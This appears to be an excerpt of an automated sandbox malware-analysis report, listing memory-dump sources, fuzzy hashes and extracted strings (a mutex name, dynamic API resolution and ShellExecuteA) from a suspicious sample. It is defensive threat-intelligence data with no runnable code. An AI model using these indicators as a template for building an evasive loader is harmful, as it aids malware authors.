                                                                                                                                                                                                                                    • Instruction ID: 18cf4e8ffa6d5e1fdaf33276b6c4df4a58afb196bb27337d92c14bad6cc7c70c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8615D71680289EFEF10DFA0CC49FEA3769EB49705F440515EE09BE1E0D7B1A644CB6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: f7f4537e511440429bfb201f5fa98d111f3321894d305e84287ca45a4c3453e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0B15875A40289CFEF14CF28CC44BA937A5FF48304F494925DC4DAF2A1D375AA94CB4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: ed609604bb0da0e062d4b5f13c65b0fb7864e1f16bcbb1aa97afd53e4cd3196e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F911DE71284289ABEF51DEA08D4DFED37A8AB48B05F444415BA09EE0E0DBB19244876B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 2ce2aec4a7ea9f7d5582d1011f79a2bddd11d17517aaf7c17983151558088577
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77614C71640288ABEF12DFA0CC49FEA3769FB44B05F444515EE09BE1E0D7B1A644CB6E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 58c6a6bba8a5290a86da6a80e87ea126674567faddccb0e6aa3da2631790b142
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B13A75A002898FEF11CF28CD44BA937A9FF44304F484965DD0DAF2A1D375AA95CF4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: b6867b410bbe437e970cd85a80def07f2a0e900bfc90f082c096ade2aa96ca97
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: E811DB71244289ABEF51DEA08D4DFEA37ACAB84B05F444415BA09EE0E0DBB19244876B
Strings
Memory Dump Source
• Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: 33a3d2747010540da02fd86a61e4120a8d8455c2a0738374a256d383d95e0b8b
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: D3615B7164028DABEF11DFA0CC49FAA3768FB04B05F540515EF09FE1E1D6B1AA448B6A
Memory Dump Source
• Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 5ca16baf1fcc214f912464accd33bec6c22feba7bcd52a37bb0fe61b138a4f0a
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 9EB11771A0028D8FEB10CF64CD44BAA37A5FF54304F484925DE09EF2A1D376AA94CF4A
Strings
Memory Dump Source
• Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 4b069400db47b4a1ff45baa07a4df046a7a0933d88db813cedff5c431b5d36ac
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: AE11DE7124428DABEF51DEA08D4DFDA37A8EB44B05F444415BB09EE0E0DAB196448B6B
Strings
Memory Dump Source
• Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: 322f2006442065e9a7c422ccfc2392a33a59eeec636f992f4e3b5d8c9836bb12
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: E0613A71640288ABEF11DFA0CC4DFFA3769FF04705F445516EA09AE2E0D7B1A6448B6B
Memory Dump Source
• Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 1e54d2e9eda2d86251620d540fc416aeef8032faea5b0f54b34e617daedb03a8
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: BEB14D75A002898FEF10CF64CC48BBA37A5FF54305F485926DC09AF3A1D375AA95CB4A
Strings
Memory Dump Source
• Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 0b1358873976e0c6f790891279a1f28cf6665a178556859b9a2d0f3b9369b1af
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 77111B31240388ABEF11DEA08D4DFFE37A8AF84B05F041415BA09EE1E0DBB19644872B